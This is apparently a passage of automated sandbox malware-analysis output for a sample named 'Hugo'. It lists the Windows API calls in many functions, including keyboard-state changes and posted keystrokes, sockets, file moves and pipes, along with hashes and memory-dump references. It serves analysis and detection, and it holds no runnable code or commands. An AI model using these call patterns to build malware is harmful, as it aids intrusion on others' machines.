                                                                                                                                                                                                              • Opcode ID: e4011b38f708840f52bf2eb4922169599221ae685df19436048ad5e7d7fa9ecc
                                                                                                                                                                                                              • Instruction ID: 10fa9ee71b87b0ca3e150f459291511068c2eebd7cab74c5e06eacde9c867f24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4011b38f708840f52bf2eb4922169599221ae685df19436048ad5e7d7fa9ecc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F371B2B4A00208BFDB259F54CC84FBABBB9FF4B3A0F140459E85557251CBB5A942FB11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00F7B8C0
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00F7B8D5
                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00F7B936
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F7B964
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F7B983
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F7B9C4
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F7B9E7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                              • Opcode ID: 5774e63a4e408887170e26d121d13cb546599469a608182e59436ab24fab7ec9
                                                                                                                                                                                                              • Instruction ID: f9300870eaa217a8f6a1d1f495212e1286cb92e49d0a0ae4a4cf79559c47d3ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5774e63a4e408887170e26d121d13cb546599469a608182e59436ab24fab7ec9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF51C1A1A087D53EFB3642388C55BBA7EA95B07714F08C48AE2DD458D2C3D8ADC4E752
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetParent.USER32(00000000), ref: 00F7B6E0
                                                                                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00F7B6F5
                                                                                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00F7B756
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F7B782
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F7B79F
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F7B7DE
                                                                                                                                                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F7B7FF
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87235514-0
                                                                                                                                                                                                              • Opcode ID: 6cbb11828811ea366c0f9fc1c3c2352617680701a2f6dc50106e2b26ad3777ba
                                                                                                                                                                                                              • Instruction ID: bceaaddfa34911b72e4e6b5e24928f6274cd7289819cd460a13c33d205602087
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6cbb11828811ea366c0f9fc1c3c2352617680701a2f6dc50106e2b26ad3777ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2551EFA0D086D53EFB368324CC55B7ABEA95B47314F0CC48AE1DD4A8C2D394A885F762
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F45F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F457E3
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00F4585E
                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00F45879
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F4589F
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,FF8BC35D,00000000,00F45F16,00000000,?,?,?,?,?,?,?,?,?,00F45F16,?), ref: 00F458BE
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,00F45F16,00000000,?,?,?,?,?,?,?,?,?,00F45F16,?), ref: 00F458F7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1324828854-0
                                                                                                                                                                                                              • Opcode ID: 09af86b056d92aae0bc8b844a187e4d8de50a29cebf43ec654c324251a6bf883
                                                                                                                                                                                                              • Instruction ID: 75aff3530478a7edc5256733d43b3ba42167a2a1aabfdbf4acc3bd672a93d2b3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09af86b056d92aae0bc8b844a187e4d8de50a29cebf43ec654c324251a6bf883
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A651B0B1E006489FDB10DFA8DC81AEEBBB8EF09720F14411AE952E7292D7309941DB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F330BB
                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00F330C3
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F33151
                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00F3317C
                                                                                                                                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00F331D1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 1170836740-1018135373
                                                                                                                                                                                                              • Opcode ID: c48c2bc97a7930528bc9880c06aa27e788df865c8ec541cc7c28221b91179969
                                                                                                                                                                                                              • Instruction ID: a033cfc6b85f12dcc4105a90938a19259d485f96fa86e7a91f721a8674d02f89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48c2bc97a7930528bc9880c06aa27e788df865c8ec541cc7c28221b91179969
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F41C534E002189BCF10EF68CC85A9EBBB5BF45378F148155E815AB392D735EB05EB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
                                                                                                                                                                                                                • Part of subcall function 00F93AAB: _wcslen.LIBCMT ref: 00F93AF8
                                                                                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00F91B6F
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F91B7E
                                                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00F91C26
                                                                                                                                                                                                              • closesocket.WSOCK32(00000000), ref: 00F91C56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2675159561-0
                                                                                                                                                                                                              • Opcode ID: febcf83a7769ba918a431e42f020468d7dd0f153aa0fcbe12a3b61f073f1dccc
                                                                                                                                                                                                              • Instruction ID: 73020c0ce43e1cfc120aad2d95d9452f7cbdb610fa5e1657f630b3abc7ff33f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: febcf83a7769ba918a431e42f020468d7dd0f153aa0fcbe12a3b61f073f1dccc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB41D671600119AFEB109F24C844BE9BBE9FF85324F148069FC169B291D774ED81DBE1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F7D7CD,?), ref: 00F7E714
                                                                                                                                                                                                                • Part of subcall function 00F7E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F7D7CD,?), ref: 00F7E72D
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 00F7D7F0
                                                                                                                                                                                                              • MoveFileW.KERNEL32(?,?), ref: 00F7D82A
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7D8B0
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00F7D8C6
                                                                                                                                                                                                              • SHFileOperationW.SHELL32(?), ref: 00F7D90C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 3164238972-1173974218
                                                                                                                                                                                                              • Opcode ID: 0046354b36f42acc7f3f2cdd31f0961dec1677d833971f9b70b62da35fd0b4a5
                                                                                                                                                                                                              • Instruction ID: 0e00de092c738028ded3da50931660129abc9b0aa768742a41fa1fc30b6a2913
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0046354b36f42acc7f3f2cdd31f0961dec1677d833971f9b70b62da35fd0b4a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7415571D0521C9EDF12EBA4DD81ADD77B8AF08350F5040EBA509EB141EB39A788EB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00FA38B8
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA38EB
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA3920
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00FA3952
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00FA397C
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA398D
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA39A7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LongWindow$MessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2178440468-0
                                                                                                                                                                                                              • Opcode ID: d655451e281edf90b086d28d0acfa743b887b5c691851b973c09d5e77da74bb0
                                                                                                                                                                                                              • Instruction ID: 74f1c40d26734ad47acfa6fa3bcc17c2af4bc304f33ffc568e55c510c3ab9637
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d655451e281edf90b086d28d0acfa743b887b5c691851b973c09d5e77da74bb0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 693155B1A44289AFDB21CF48DC84F6937A5FB8B320F1411A4F5158F2B2CB74A944FB11
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F780D0
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F780F6
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00F780F9
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00F78117
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 00F78120
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00F78145
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00F78153
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                              • Opcode ID: a788eab1c5e55849ccfa24cff9300bbaf4c70ef0067b386fef677335b99bf938
                                                                                                                                                                                                              • Instruction ID: d88367b29664dd36a6ae06fb6d61870ca3fac22cd9ed10b3ccbdb01a91f83e2e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a788eab1c5e55849ccfa24cff9300bbaf4c70ef0067b386fef677335b99bf938
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71219772600219AF9F10DFA8CC88DBB77ACEB093607448426F909DB2A0DB74DC479761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F781A9
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F781CF
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00F781D2
                                                                                                                                                                                                              • SysAllocString.OLEAUT32 ref: 00F781F3
                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 00F781FC
                                                                                                                                                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00F78216
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00F78224
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3761583154-0
                                                                                                                                                                                                              • Opcode ID: 898ef0a192616eda0a5a60c4c2a2e8919565e7c0d544d76862ee40c67849ef49
                                                                                                                                                                                                              • Instruction ID: b2c476e855e21b9128e9eaee200c171f6b42e3b830268afb07217d64605ffb85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 898ef0a192616eda0a5a60c4c2a2e8919565e7c0d544d76862ee40c67849ef49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C218871600108BF9B10DFB8DC89DAA77ECEB09370704C126F905CB1A1DA74EC42E765
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 00F80E99
                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80ED5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                                                              • Opcode ID: 6967b203e3eb400bb9fea8f0fd83c9b35f52365c885d5e128e52f10e3bb7bfaf
                                                                                                                                                                                                              • Instruction ID: c6b45a272f3baa13a8b130b38ad348a1dd51c0bfa48f2cb09db891e9af0118dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6967b203e3eb400bb9fea8f0fd83c9b35f52365c885d5e128e52f10e3bb7bfaf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99216D7190030AABDB60AF24DC05ADA77E8FF55720F608A59FDA5E72E0DB709844EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00F80F6D
                                                                                                                                                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00F80FA8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandlePipe
                                                                                                                                                                                                              • String ID: nul
                                                                                                                                                                                                              • API String ID: 1424370930-2873401336
                                                                                                                                                                                                              • Opcode ID: 02efc425d66ffac79b76366df05f507ba3d3deca95ccd421d3c582be45dd479f
                                                                                                                                                                                                              • Instruction ID: 2a48535ee47f7bb2b35063d8230f2040768ac20dda66f694b6adcde79d4c6667
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02efc425d66ffac79b76366df05f507ba3d3deca95ccd421d3c582be45dd479f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D2216071A003499BEB20AF689C04ADA77E8FF55730F204B19F9A1D72D0DB709885EB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00F178B1
                                                                                                                                                                                                                • Part of subcall function 00F17873: GetStockObject.GDI32(00000011), ref: 00F178C5
                                                                                                                                                                                                                • Part of subcall function 00F17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F178CF
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00FA4BB0
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00FA4BBD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00FA4BC8
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00FA4BD7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00FA4BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                              • String ID: Msctls_Progress32
                                                                                                                                                                                                              • API String ID: 1025951953-3636473452
                                                                                                                                                                                                              • Opcode ID: d2f512bbe93f798370dc9f6b8bdbd9a0e3dcd4c9cbb018fd85979db625f936c5
                                                                                                                                                                                                              • Instruction ID: 2798cf014c7cf83944e79c2d4a2dbb22f43eb0635ecfd397f89d67183b8182cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2f512bbe93f798370dc9f6b8bdbd9a0e3dcd4c9cbb018fd85979db625f936c5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D61193B254021DBEEF119EA4CC85EEB7F6DEF497A8F014111B618A6090CA75DC21ABB0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F4DB23: _free.LIBCMT ref: 00F4DB4C
                                                                                                                                                                                                              • _free.LIBCMT ref: 00F4DBAD
